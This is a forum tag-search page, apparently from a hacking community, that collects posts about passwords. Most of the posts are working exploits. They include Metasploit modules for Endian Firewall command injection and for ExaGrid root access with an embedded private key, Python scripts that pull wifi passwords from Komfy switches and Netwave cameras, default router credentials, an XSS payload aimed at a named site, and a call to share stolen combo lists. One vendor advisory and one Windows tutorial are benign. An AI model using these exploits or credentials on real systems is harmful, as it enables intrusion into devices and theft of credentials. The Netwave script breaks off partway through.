Search the forums

Showing results for the tag 'password'.



25 results found

  1. Moeein Seven

    Hacking

    "Password attacks" training course from Faranesh, price 20000, by Behrouz Mansouri. Password attacks.rar - Telegram File Download Service
  2. Hello. This exploit was sold on this site for $100. Another honor for our security team, whose tools have been put up for sale. Congratulations to Reza Gol.

    # Exploit Title: Latest ZTE F609 Indihome Router Password Default
    # Google Dork: "ZTE F609 IP Addresses 192.168.1.1"
    # Date: 02/10/2018
    # Exploit Author: Rednfozi
    # Vendor Homepage: http://setuprouter.com/router/zte/f609/login.htm
    # Software Link: N/A
    # Version: ZTE F609
    # Tested on: win
    # CVE : N/A
    # Team: https://www.exploit-db.com/author/?a=2243
    # mypege https://cxsecurity.com/author/Inj3ct0r/1/
    # me: Inj3ctor@gmx.us
    ***************************************************************|
    |[+] Exploit :info
    # 1. Description:
    Latest ZTE F609 Indihome Router Password Default - Telkom regularly changes their ZTE F609 Indihome router password. Well, this action can be used because it turns out that the password used in several locations is the same. Log in to the ZTE F609 router. Okay, right, yes, here is a list that you can try:
    Login to the ZTE F609 Router
    Find Your ZTE F609 Router IP Address
    We need to know the Internal IP Address of your ZTE F609 router before we can login to it.
    ZTE F609 IP Addresses 192.168.1.1
    |--------------------------------------------------------------|
    |[+] username : user password : user username : admin password : Pq@54r!e8ow&q#u username : admin password : Dj9@t!n03g4r6#f username : admin password : admin username : admin password : telkomjatineg4r4 username : admin password : Telkomdso123
    Well, if you successfully log in, it looks: http://setuprouter.com/router/zte/f609/login.htm
    Okay share this time. If there is an update password, or another password that works in your area, please comment so that later I will include it in the post so that in the future this article will
    |--------------------------------------------------------------|
    ****************************************************************
    Discovered by : Rednfozi
    Thanks To: ReZa CLONER , Moeein Seven Inj3ct0r .soldier anonymous. milad shadow
    https://0days.info/?exp=9661346
    http://www.exploit4arab.org/exploits/2086
  3. SEC Consult Vulnerability Lab Security Advisory < 20181001-0 >
    =======================================================================
    title: Password disclosure vulnerability & XSS
    product: PTC ThingWorx
    vulnerable version: 6.5-7.4, 8.0.x, 8.1.x, 8.2.x
    fixed version: see Solution section
    CVE number: CVE-2018-17216, CVE-2018-17217, CVE-2018-17218
    impact: critical
    homepage: https://www.ptc.com
    found: 2018-03-13
    by: M. Tomaselli (Office Munich)
        SEC Consult Vulnerability Lab
        An integrated part of SEC Consult
        Europe | Asia | North America
        https://www.sec-consult.com
    =======================================================================

    Vendor description:
    -------------------
    "ThingWorx is more than an IoT platform; it provides the functionality, flexibility and scalability that businesses need to drive industrial innovation, including the ability to source, contextualize and synthesize data while orchestrating processes and delivering powerful web, mobile and AR experiences."
    Source: https://www.ptc.com/en/thingworx8

    Business recommendation:
    ------------------------
    ThingWorx allows to configure Things to communicate with other services over several protocols (e.g. LDAP integration via a DirectoryServices Thing). In order to communicate with services that require authentication, ThingWorx provides functionality to associate credentials to a Thing.
    During a brief audit it was noticed that ThingWorx Composer leaks the following sensitive data:
    1) The PBKDF2WithHmac512 password hash of a user Thing
    2) The AES encrypted password of several Things containing password attributes
    Furthermore, the password used for encryption is hard-coded and thus identical along all installations.
    Besides the above mentioned vulnerabilities a reflected cross-site scripting vulnerability was identified in the ThingWorx SQUEAL search function.
    The vendor provides a patch which should be installed immediately.
    It is recommended to perform further thorough security audits as the product may be affected by other potential security vulnerabilities.

    Vulnerability overview/description:
    -----------------------------------
    1) Disclosure of User Password Hashes to Privileged Users (CVE-2018-17216)
    ThingWorx discloses the PBKDF2WithHmac512 hashed passwords of its application users when doing exports with an administrative account. This enables an attacker to conduct offline brute-force or dictionary attacks against the obtained password hashes.

    2) Disclosure of Encrypted Credentials and Use of Hard-Coded Passwords (CVE-2018-17217)
    A critical information disclosure vulnerability leaks the AES encrypted passwords of services configured within ThingWorx. Due to a hard-coded master password in the SecureData class, an attacker is able to decrypt the obtained passwords which grants him access to other services. The AES encrypted password gets disclosed in the server response when a user/attacker visits a Thing that contains credentials.

    3) Reflected Cross-Site Scripting (CVE-2018-17218)
    The JavaScript part of the ThingWorx SQUEAL search functionality (searchExpression parameter) which is responsible for parsing the obtained JSON response fails to properly sanitize user supplied input. If the victim views attacker-prepared content (e.g. on a website or in an HTML email) an attacker is able to execute arbitrary actions in the context of its victims' sessions.

    Proof of concept:
    -----------------
    The proof of concept has been removed from this advisory.

    Vulnerable / tested versions:
    -----------------------------
    The vulnerabilities have been verified to exist in version 8.0.1-b39 which was the latest version available at the time of the test. The vendor provided further affected version information. See the Solution section for reference.

    Vendor contact timeline:
    ------------------------
    2018-03-14: Contacting vendor through email
    2018-03-16: Advisory sent to vendor via encrypted mail
    2018-03 - 2018-09: Multiple phone calls with PTC R&D department discussing release & multi-party disclosure
    2018-08-15: Vendor provided private notifications to customers to give 45 days to upgrade
    2018-10-01: Coordinated release of SEC Consult advisory

    Solution:
    ---------
    Best recommendation is to upgrade to the latest version of ThingWorx to version 8.3.2 (at time of writing). For newer versions, the issue of the hard coded password has been fixed and the SQUEAL function removed.
    The minimum upgrade to obtain mitigations for all 3 issues depends on the version of ThingWorx in use.
    For ThingWorx versions 6.5-7.4, upgrade to 7.4.14+
    For ThingWorx version 8.0.x, upgrade to 8.0.12+
    For ThingWorx version 8.1.x, upgrade to 8.1.7+
    For ThingWorx version 8.2.x, upgrade to 8.2.4+
    The vendor always recommends upgrading to the latest available service pack.
    See the following advisory by the vendor for further information:
    https://www.ptc.com/en/support/article?n=CS291004

    Workaround:
    -----------
    1) Disclosure of User Password Hashes to Privileged Users
    To limit exposure, disable all native ThingWorx users and solely rely on users that make use of Active Directory or Single Sign On (SSO) authentication, since the password hashes are then not saved within ThingWorx.
    2) Disclosure of Encrypted Credentials and Use of Hard-Coded Passwords
    None.
    3) Reflected Cross-Site Scripting
    This issue only exists because of a deprecated feature called SQUEAL. Removal of this function will eliminate the XSS issue.
    a. This SQUEAL functionality is already removed in ThingWorx 8.1.0+.
    b. For versions older than 8.1.0, a workaround is available at the PTC support site.
    Updating to fix all 3 issues is recommended.

    Advisory URL:
    -------------
    https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    SEC Consult Vulnerability Lab
    SEC Consult
    Europe | Asia | North America

    About SEC Consult Vulnerability Lab
    The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies.
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    Interested to work with the experts of SEC Consult? Send us your application https://www.sec-consult.com/en/career/index.html
    Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://www.sec-consult.com/en/contact/index.html
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    Mail: research at sec-consult dot com
    Web: https://www.sec-consult.com
    Blog: http://blog.sec-consult.com
    Twitter: https://twitter.com/sec_consult

    EOF M. Tomaselli / @2018
  4. Title: Borland's InterBase 7.1 poor Password Data File Permissions and Password Hash
    Author: Larry W. Cashdollar, @_larry0
    Date: 2003-11-26
    CVE-ID: [CVE-2004-1833]
    Download Site: http://www.borland.com/interbase
    Vendor: Borland
    Vendor Notified: 2003-11-26
    Vendor Contact: disclosed via idefense
    Advisory: http://www.vapid.dhs.org/advisories/borland_interbase_db_vulnerablities.html

    Description:
    Borland InterBase raises the bar for performance and power in small footprint databases. Designed for use in situations where there is no database administrator or IT support, InterBase is powerful enough to support mission-critical applications, yet compact enough to run on very modest systems. It can be easily transported by disk, CD, or even dial-up download. And unlike enterprise databases that require expensive ecosystems of support and maintenance, InterBase requires virtually no maintenance.

    Vulnerability:
    The "information database" stored in the file admin4.pcb is read and writeable for all users with local access to the system.

    [root@Fester interbase]# ls -l /opt/interbase/admin.ib
    -rw-rw-rw- 1 root root 616497 Nov 20 10:04 /opt/interbase/admin.ib

    Not only is the password file stored read-writeable by all local users, but the password hash is done with one salt "9z" and then hashed again. As an addition to the permissions issue, I thought I should flesh out the fact that the double crypt() does not add any security to the hash without the salt. The purpose of the salt is so that the same passwords don't always have the same hashes. With them removing the salt the hashes will always be the same for the same password regardless of crypt() being called twice. This can be expressed in this line of pseudo C:

    crypt(&crypt(user_password,"9z")[2],"9z")

    Exploit Code:
    Local attackers can exploit this vulnerability to add or modify accounts in Interbase. The following C program will generate hashed passwords that can be injected into the admin.ib database.

    /* Larry W. Cashdollar Vapid Labs.
       Borland Interbase 7.1 password creator.
       lwc@vapid.dhs.org
       Build with: gcc interbase_pw.c -o interbase_pw -lcrypt */
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>
    #include <crypt.h>

    #define SALT "9z"

    int main (int argc, char *argv[])
    {
      char *crypt1, *crypt2;  /* crypt() returns a pointer to a static buffer */

      if (argc < 2) {
        printf ("Borland InterBase db password tool.\n Larry Cashdollar, vapid labs\nEnter desired password as an argument\n");
        exit(1);
      }
      /* First pass: traditional DES crypt() of the password with the fixed salt.
         Copy it, since the second crypt() call reuses the same static buffer. */
      crypt1 = strdup(crypt (argv[1], SALT));
      /* Second pass: crypt() the first hash minus its 2-character salt, with the same fixed salt. */
      crypt2 = crypt (&crypt1[2], SALT);
      printf("Double crypt() is: %s\n", crypt2);
      /* InterBase stores the result without its salt prefix. */
      printf("Without salt (as stored in isc4.gdb/admin.ib): %s\n", &crypt2[2]);
      free(crypt1);
      return(0);
    }
  5. ############################################
    # Title : user and password of the American Recovery site XSS Vulnerability
    # Author : Rednofozi
    # category : webapps
    # Tested On : Win 8 , Kali Linux
    # my team: https://anonysec.org
    # me : Rednofozi@yahoo.com
    # Vendor HomePage : https://www.diamondcard.us
    # Google Dork: inurl:''/.php?pass=' site:us
    ############################################
    # search google Dork : inurl:''/.php?pass=' site:us
    #################### Proof of Concept #############
    # Demo and test : https://www.diamondcard.us/download/api/example.php' (xxsVulnerability) <script>alert("rednofozi")</script>
    # Discovered by : Rednofozi
    #--tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow
    http://www.exploit4arab.org/exploits/1982
  6. ##
    # This module requires Metasploit: http://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##

    require 'msf/core'

    class Metasploit4 < Msf::Exploit::Remote
      include Msf::Exploit::Remote::HttpClient
      include Msf::Exploit::CmdStager

      def initialize(info = {})
        super(update_info(info,
          'Name'        => 'Endian Firewall Proxy Password Change Command Injection',
          'Description' => %q{
            This module exploits an OS command injection vulnerability in a
            web-accessible CGI script used to change passwords for locally-defined
            proxy user accounts. Valid credentials for such an account are required.
            Command execution will be in the context of the "nobody" account, but
            this account had broad sudo permissions, including to run the script
            /usr/local/bin/chrootpasswd (which changes the password for the Linux
            root account on the system to the value specified by console input once
            it is executed).
            The password for the proxy user account specified will *not* be changed
            by the use of this module, as long as the target system is vulnerable
            to the exploit.
            Very early versions of Endian Firewall (e.g. 1.1 RC5) require HTTP basic
            auth credentials as well to exploit this vulnerability. Use the USERNAME
            and PASSWORD advanced options to specify these values if required.
            Versions >= 3.0.0 still contain the vulnerable code, but it appears to
            never be executed due to a bug in the vulnerable CGI script which also
            prevents normal use (http://jira.endian.com/browse/UTM-1002).
            Versions 2.3.x and 2.4.0 are not vulnerable because of a similar bug
            (http://bugs.endian.com/print_bug_page.php?bug_id=3083).
            Tested successfully against the following versions of EFW Community:
            1.1 RC5, 2.0, 2.1, 2.2, 2.5.1, 2.5.2.
            Should function against any version from 1.1 RC5 to 2.2.x, as well as
            2.4.1 and 2.5.x.
          },
          'Author'      => [
            'Ben Lincoln' # Vulnerability discovery, exploit, Metasploit module
          ],
          'References'  => [
            ['CVE', '2015-5082'],
            ['URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5082'],
            ['EDB', '37426'],
            ['EDB', '37428']
          ],
          'Privileged'  => false,
          'Platform'    => %w{ linux },
          'Payload'     => {
            'BadChars'    => "\x00\x0a\x0d",
            'DisableNops' => true,
            'Space'       => 2048
          },
          'Targets'     => [
            [ 'Linux x86',
              { 'Platform' => 'linux', 'Arch' => ARCH_X86, 'CmdStagerFlavor' => [ :echo, :printf ] } ],
            [ 'Linux x86_64',
              { 'Platform' => 'linux', 'Arch' => ARCH_X86_64, 'CmdStagerFlavor' => [ :echo, :printf ] } ]
          ],
          'DefaultOptions' => { 'SSL' => true, 'RPORT' => 10443 },
          'DefaultTarget'  => 0,
          'DisclosureDate' => 'Jun 28 2015',
          'License'        => MSF_LICENSE
        ))

        register_options([
          OptString.new('TARGETURI', [true, 'Path to chpasswd.cgi CGI script', '/cgi-bin/chpasswd.cgi']),
          OptString.new('EFW_USERNAME', [true, 'Valid proxy account username for the target system']),
          OptString.new('EFW_PASSWORD', [true, 'Valid password for the proxy user account']),
          OptString.new('RPATH', [true, 'Target PATH for binaries used by the CmdStager', '/bin'])
        ], self.class)

        register_advanced_options([
          OptInt.new('HTTPClientTimeout', [ true, 'HTTP read response timeout (seconds)', 5])
        ], self.class)
      end

      def exploit
        # Cannot use generic/shell_reverse_tcp inside an elf
        # Checking before proceeds
        if generate_payload_exe.blank?
          fail_with(Failure::BadConfig, "#{peer} - Failed to store payload inside executable, " +
            "please select a native payload")
        end

        execute_cmdstager(:linemax => 200, :nodelete => true)
      end

      def execute_command(cmd, opts)
        cmd.gsub!('chmod', "#{datastore['RPATH']}/chmod")
        req(cmd)
      end

      def req(cmd)
        sploit = "#{datastore['EFW_PASSWORD']}; #{cmd};"

        post_data = Rex::MIME::Message.new
        post_data.add_part('change', nil, nil, 'form-data; name="ACTION"')
        post_data.add_part(datastore['EFW_USERNAME'], nil, nil, 'form-data; name="USERNAME"')
        post_data.add_part(datastore['EFW_PASSWORD'], nil, nil, 'form-data; name="OLD_PASSWORD"')
        post_data.add_part(sploit, nil, nil, 'form-data; name="NEW_PASSWORD_1"')
        post_data.add_part(sploit, nil, nil, 'form-data; name="NEW_PASSWORD_2"')
        post_data.add_part(' Change password', nil, nil, 'form-data; name="SUBMIT"')

        data = post_data.to_s
        boundary = post_data.bound
        referer_url = "https://#{datastore['RHOST']}:#{datastore['RPORT']}" + "#{datastore['TARGETURI']}"

        res = send_request_cgi({
          'method'  => 'POST',
          'uri'     => datastore['TARGETURI'],
          'ctype'   => "multipart/form-data; boundary=#{boundary}",
          'headers' => { 'Referer' => referer_url },
          'data'    => data
        })

        if res
          if res.code == 401
            fail_with(Failure::NoAccess, "#{rhost}:#{rport} - Received a 401 HTTP response - " +
              "specify web admin credentials using the USERNAME " +
              "and PASSWORD advanced options to target this host.")
          end
          if res.code == 404
            fail_with(Failure::Unreachable, "#{rhost}:#{rport} - Received a 404 HTTP response - " +
              "your TARGETURI value is most likely not correct")
          end
        end
      end
    end
  7. ReZa CLONER

    Cracking

    Greetings. In this topic, post your Iranian and foreign combo lists. Topic rules: 1- Post your list only as code or as a download link (upload it inside the forum wherever possible) 2- Be sure to state whether your list is email:pass or user:pass 3- Refrain from spamming
  8. Moeein Seven

    Soft-Windows

    Download this software for Windows: https://www.microsoft.com/en-us/store/p/lastpass-free-password-manager/9nblggh4v7x0
  9. In this method you choose a picture of your own, for example a wildlife picture with many animals; then, with the mouse or your finger, you click on points of your choice or draw fixed lines, and from then on these points are your password. Each time you sign in you must mark these points again exactly as before to be allowed into the system. To do this:
    • First, from the main Metro start screen, click Control Panel. In Control Panel, go to the Users section and click Create a Picture Password.
    • Type the password you have set for your user account. Make sure you have already set a password for your account, because otherwise a picture password cannot be created.
    • On the next page click Choose picture. Select a picture of your choice, click Open, then click Use this picture.
    • Now, in three steps, draw the line or point you want on the part of the picture you have in mind. After each line or point is drawn you are automatically taken to the next step. Finally, you must do this once more to confirm the picture password. At the end click OK.
    • Now, whenever you want to sign in to your account again, you must enter this picture password; if you forget the picture password you can use the typed password instead.
  10. # Exploit Title: Huawei HG630a and HG630a-50 Default SSH Admin Password on Adsl Modems
    # Date: 10.11.2015
    # Exploit Author: Murat Sahin (@murtshn)
    # Vendor Homepage: Huawei
    # Version: HG630a and HG630a-50
    # Tested on: linux,windows

    ADSL modems force you to change the admin web interface password. Even though you can change the admin password on the web interface, the password you assign does not apply to SSH. So, the SSH password will always be 'Username:admin Password:admin'.

    Ex:
    *ssh admin@modemIP <admin@192.168.1.1>*
    admin@modemIP <admin@192.168.1.1>'s password: *admin*
    PTY allocation request failed on channel 0
    ------------------------------
    - -----Welcome to ATP Cli------
    -------------------------------
    ATP>?
    ?
    cls debug help save ? exit
    ATP>shell
    shell
    BusyBox vv1.9.1 (2013-12-31 16:16:20 CST) built-in shell (ash)
    Enter 'help' for a list of built-in commands.
    # cat /proc/version
    cat /proc/version
    Linux version 2.6.30 (y00179387@localhost) (gcc version 4.4.2 (Buildroot 2010.02-git) ) #10 SMP PREEMPT Tue Dec 31 16:20:50 CST 2013
    #
  11. Moeein Seven

    Hacking

    ##
    # This module requires Metasploit: http://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##

    require 'msf/core'
    require 'net/ssh'

    class MetasploitModule < Msf::Exploit::Remote
      Rank = ExcellentRanking

      include Msf::Auxiliary::Report
      include Msf::Exploit::Remote::SSH

      def initialize(info = {})
        super(update_info(info, {
          'Name'        => 'ExaGrid Known SSH Key and Default Password',
          'Description' => %q{
            ExaGrid ships a public/private key pair on their backup appliances to
            allow passwordless authentication to other ExaGrid appliances. Since
            the private key is easily retrievable, an attacker can use it to gain
            unauthorized remote access as root. Additionally, this module will
            attempt to use the default password for root, 'inflection'.
          },
          'Platform'    => 'unix',
          'Arch'        => ARCH_CMD,
          'Privileged'  => true,
          'Targets'     => [ [ "Universal", {} ] ],
          'Payload'     => {
            'Compat'  => {
              'PayloadType'    => 'cmd_interact',
              'ConnectionType' => 'find',
            },
          },
          'Author'      => ['egypt'],
          'License'     => MSF_LICENSE,
          'References'  => [
            [ 'CVE', '2016-1560' ], # password
            [ 'CVE', '2016-1561' ], # private key
            [ 'URL', 'https://community.rapid7.com/community/infosec/blog/2016/04/07/r7-2016-04-exagrid-backdoor-ssh-keys-and-hardcoded-credentials' ]
          ],
          'DisclosureDate' => "Apr 07 2016",
          'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
          'DefaultTarget'  => 0
        }))

        register_options(
          [
            # Since we don't include Tcp, we have to register this manually
            Opt::RHOST(),
            Opt::RPORT(22)
          ], self.class
        )

        register_advanced_options(
          [
            OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
            OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
          ]
        )
      end

      # helper methods that normally come from Tcp
      def rhost
        datastore['RHOST']
      end

      def rport
        datastore['RPORT']
      end

      def do_login(ssh_options)
        begin
          ssh_socket = nil
          ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
            ssh_socket = Net::SSH.start(rhost, 'root', ssh_options)
          end
        rescue Rex::ConnectionError
          return
        rescue Net::SSH::Disconnect, ::EOFError
          print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
          return
        rescue ::Timeout::Error
          print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
          return
        rescue Net::SSH::AuthenticationFailed
          print_error "#{rhost}:#{rport} SSH - Failed authentication"
        rescue Net::SSH::Exception => e
          print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
          return
        end

        if ssh_socket
          # Create a new session from the socket, then dump it.
          conn = Net::SSH::CommandStream.new(ssh_socket, '/bin/bash -i', true)
          ssh_socket = nil
          return conn
        else
          return false
        end
      end

      # Ghetto hack to prevent the shell detection logic from hitting false
      # negatives due to weirdness with ssh sockets. We already know it's a shell
      # because auth succeeded by this point, so no need to do the check anyway.
      module TrustMeItsAShell
        def _check_shell(*args)
          true
        end
      end

      def exploit
        payload_instance.extend(TrustMeItsAShell)

        factory = ssh_socket_factory
        ssh_options = {
          auth_methods: ['publickey'],
          config: false,
          use_agent: false,
          key_data: [ key_data ],
          port: rport,
          proxy: factory,
          non_interactive: true
        }

        ssh_options.merge!(verbose: :debug) if datastore['SSH_DEBUG']

        conn = do_login(ssh_options)
        unless is_success?(conn, true)
          ssh_options[:auth_methods] = ['password']
          ssh_options[:password] = 'inflection'
          ssh_options.delete(:key_data)
          conn = do_login(ssh_options)
          is_success?(conn, false)
        end
      end

      def is_success?(conn, key_based)
        if conn
          print_good "Successful login"
          service_data = {
            address: rhost,
            port: rport,
            protocol: 'tcp',
            service_name: 'ssh',
            workspace_id: myworkspace_id,
          }

          credential_data = {
            username: 'root',
            private_type: ( key_based ? :ssh_key : :password ),
            private_data: ( key_based ? key_data : 'inflection' ),
            origin_type: :service,
            module_fullname: fullname,
          }.merge(service_data)

          core = create_credential(credential_data)

          login_data = {
            core: core,
            last_attempted: Time.now,
          }.merge(service_data)

          create_credential_login(login_data)

          handler(conn.lsock)
          true
        else
          false
        end
      end

      def key_data
        <<EOF
    -----BEGIN RSA PRIVATE KEY-----
    MIICWAIBAAKBgGdlD7qeGU9f8mdfmLmFemWMnz1tKeeuxKznWFI+6gkaagqjAF10
    hIruzXQAik7TEBYZyvw9SvYU6MQFsMeqVHGhcXQ5yaz3G/eqX0RhRDn5T4zoHKZa
    E1MU86zqAUdSXwHDe3pz5JEoGl9EUHTLMGP13T3eBJ19MAWjP7Iuji9HAgElAoGA
    GSZrnBieX2pdjsQ55/AJA/HF3oJWTRysYWi0nmJUmm41eDV8oRxXl2qFAIqCgeBQ
    BWA4SzGA77/ll3cBfKzkG1Q3OiVG/YJPOYLp7127zh337hhHZyzTiSjMPFVcanrg
    AciYw3X0z2GP9ymWGOnIbOsucdhnbHPuSORASPOUOn0CQQC07Acq53rf3iQIkJ9Y
    iYZd6xnZeZugaX51gQzKgN1QJ1y2sfTfLV6AwsPnieo7+vw2yk+Hl1i5uG9+XkTs
    Ry45AkEAkk0MPL5YxqLKwH6wh2FHytr1jmENOkQu97k2TsuX0CzzDQApIY/eFkCj
    QAgkI282MRsaTosxkYeG7ErsA5BJfwJAMOXYbHXp26PSYy4BjYzz4ggwf/dafmGz
    ebQs+HXa8xGOreroPFFzfL8Eg8Ro0fDOi1lF7Ut/w330nrGxw1GCHQJAYtodBnLG
    XLMvDHFG2AN1spPyBkGTUOH2OK2TZawoTmOPd3ymK28LriuskwxrceNb96qHZYCk
    86DC8q8p2OTzYwJANXzRM0SGTqSDMnnid7PGlivaQqfpPOx8MiFR/cGr2dT1HD7y
    x6f/85mMeTqamSxjTJqALHeKPYWyzeSnUrp+Eg==
    -----END RSA PRIVATE KEY-----
    EOF
      end
    end
  12. #!/usr/bin/python
    # Exploit Title: Komfy Switch with Camera Wifi Password Disclosure via Bluetooth BLE
    # Date: Oct 13, 2016
    # Exploit Author: Jason Doyle @_jasondoyle
    # Vendor Homepage: http://us.dlink.com/products/connected-home/komfy-switch-with-camera/
    # HW Model: DKZ-201S/W
    # SW Version: 1.0
    # Tested on: Ubuntu 16.04 LTS / Python 2.7
    # Disclosure Timeline: 10/11/16 Reported vulnerability to D-Link
    #                      10/11/16 D-Link responded - The Komfy switch will be discontinued 12/30/16. No fix planned.
    # Vulnerability Summary
    #It is possible for an unauthenticated, remote attacker to retrieve the Komfy device's associated wifi ssid and password over bluetooth (4.0/BLE).
    # Vulnerability Details
    #https://github.com/jasondoyle/Komfy-Switch-Wifi-Password-Disclosure
    # Author: Jason Doyle @_jasondoyle
    # Komfy Switch with Camera wifi password disclosure exploit script

    import sys  # needed for sys.exit() below; missing in the original listing
    import re, base64
    from bluepy.btle import Scanner
    from gattlib import GATTRequester

    #lookup table to unscramble
    base64Alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="  # '=' used for padding
    komfy64Alphabet = "qazwersdfxcvbgtyhnmjklpoiu5647382910+/POIKLMJUYTGHNBVFREWSDCXZAQ$"  # '$' used for padding

    scanner = Scanner()
    devices = scanner.scan(5.0)
    bAddr = ""
    for dev in devices:
        if "6c:72:20" in dev.addr and dev.getValueText(1) and dev.getValueText(7) and dev.getValueText(9):
            bAddr = dev.addr
            print "[+] Komfy switch found: %s (%s), RSSI=%d dB" % (dev.addr, dev.addrType, dev.rssi)

    if not bAddr:
        print "No Komfy switches found"
        sys.exit(1)

    req = GATTRequester(bAddr.encode('ascii','ignore'), False, 'hci0')
    req.connect(True, 'public', 'none', 0, 78)

    #request SSID
    wifiSsid = req.read_by_uuid("0xb006")[0]
    reg = re.search(r"(:\s\"(.*)\")", wifiSsid)
    wifiSsid = reg.groups()[1].replace("\\","")

    #request komfy encoded wifi password
    wifiPassKomfy64 = req.read_by_uuid("0xb007")[0]
    reg = re.search(r"(:\s\"(.*)\")", wifiPassKomfy64)
    wifiPassKomfy64 = reg.groups()[1].replace("\\","")

    #convert password to real base64
    wifiPassBase64 = ""
    for char in wifiPassKomfy64:
        i = komfy64Alphabet.index(char)
        wifiPassBase64 += base64Alphabet[i]
    wifiPass = base64.b64decode(wifiPassBase64)

    print "[+] Wifi password found for Komfy Switch [%s] SSID: %s Password: %s" % (bAddr, wifiSsid, wifiPass)
  13. Moeein Seven

    Hacking

    #!/bin/sh
    #
    # Acoem 01dB CUBE Smart Noise Monitoring Terminal
    # Remote Password Change
    #
    # HW version: LIS001A
    # Application FW: 2.34
    # Metrology FW: 2.10
    # Modem FW: 12.00.005 / 08.01.108
    #
    #
    # Copyright 2016 (c) Todor Donev
    # <todor.donev at gmail.com>
    # https://www.ethical-hacker.org/
    # https://www.facebook.com/ethicalhackerorg
    #
    # Disclaimer:
    # This or previous programs is for Educational
    # purpose ONLY. Do not use it without permission.
    # The usual disclaimer applies, especially the
    # fact that Todor Donev is not liable for any
    # damages caused by direct or indirect use of the
    # information or functionality provided by these
    # programs. The author or any Internet provider
    # bears NO responsibility for content or misuse
    # of these programs or any derivatives thereof.
    # By using these programs you accept the fact
    # that any damage (dataloss, system crash,
    # system compromise, etc.) caused by the use
    # of these programs is not Todor Donev's
    # responsibility.
    #
    # Use them at your own risk!
    #
    # Thanks to Maya Hristova that support me.

    [todor@adamantium ~]$ GET "http://<TARGET>/ajax/F_validPassword.asp?NewPwd=<PASSWORD>"
  14. Moeein Seven

    Hacking

    #!/usr/bin/python2.7
    ##
    ## spiritnull(at)sigaint.org
    ##
    ## Run the exploit against the victim to get WIFI password
    ## If the victim is vulnerable to memory leak it will try to extract the username and password for the weblogin
    ##
    ## magic for you bash:
    ## wget -qO- http://[HOST]:[PORT]//proc/kcore | strings
    ## wget -qO- http://[HOST]:[PORT]//etc/RT2870STA.dat
    ## wget -qO- http://[HOST]:[PORT]//dev/rom0
    ## wget -qO- http://[HOST]:[PORT]/get_status.cgi
    ##
    ## shodan dork:
    ## "Server: Netwave IP Camera"
    ##
    ## zoomeye dork:
    ## Netwave IP camera http config
    ##

    import sys,os,time,tailer
    import urllib2
    import subprocess
    import signal
    from threading import Thread

    try:
        if sys.argv[1] == "-h" or sys.argv[1] == "--help":
            print "Usage: python pownetwave.py [HOST]:[PORT]"
            print "Example: python pownetwave.py 127.0.0.1:81"
            sys.exit(0)
        else:
            pass
    except IndexError:
        print "Usage: python pownetwave.py [HOST]:[PORT]"
        print "Example: python pownetwave.py 127.0.0.1:81"
        sys.exit(0)

    def signal_handler(signal, frame):
        print('\nclearing up..')
        os.system("rm -rf tmpstream.txt")
        os.system("rm -rf tmpstrings.out")
        os.system("killall -9 wget")
        os.system("killall -9 tail")
        sys.exit(0)

    signal.signal(signal.SIGINT, signal_handler)

    macaddr = ""
    done = 0
    linecount = 0

    class bcolors:
        HEADER = '\033[95m'
        OKBLUE = '\033[94m'
        OKGREEN = '\033[92m'
        WARNING = '\033[93m'
        FAIL = '\033[91m'
        ENDC = '\033[0m'
        BOLD = '\033[1m'
        UNDERLINE = '\033[4m'

    print "getting system information.."+sys.argv[1]
    response = urllib2.urlopen('http://'+sys.argv[1]+'/get_status.cgi')
    xcontent = response.read().split(";\n")
    for line in xcontent:
        if line.startswith("var id="):
            line = line.split("'")
            macaddr = line[1]
        else:
            pass
    print "victims MAC-ADDRESS: "+bcolors.OKGREEN+str(macaddr)+bcolors.ENDC

    print "getting wireless information.."
    try:
        resp = urllib2.urlopen("http://"+sys.argv[1]+"//etc/RT2870STA.dat")
        xcontent = resp.read().split("\n")
        print "victims wireless information.."
        for line in xcontent:
            if line.startswith("WPAPSK") or line.startswith("SSID"):
                print "\t\t"+bcolors.OKGREEN+str(line)+bcolors.ENDC
            else:
                print "\t\t"+str(line)
    except:
        print "wireless lan is disabled.."

    print "checking for memory dump vulnerability.."
    try:
        urllib2.urlopen('http://'+sys.argv[1]+'//proc/kcore')
    except:
        print bcolors.FAIL+"victim isnt vulnerable for a memory leak, exiting.."+bcolors.ENDC
        sys.exit(0)

    print "starting to read memory dump.. "+bcolors.WARNING+"this could take a few minutes"+bcolors.ENDC
    proc = subprocess.Popen("wget -qO- http://"+sys.argv[1]+"//proc/kcore > tmpstream.txt", shell=True, preexec_fn=os.setsid)
    os.system('echo "" >tmpstrings.out')
    time.sleep(1)
    proc2 = subprocess.Popen("tail -f tmpstream.txt | strings >>tmpstrings.out", shell=True, preexec_fn=os.setsid)
    print bcolors.BOLD+"hit CTRL+C to exit.."+bcolors.ENDC

    while 1:
        sys.stdout.flush()
        if os.stat('tmpstrings.out').st_size <= 1024:
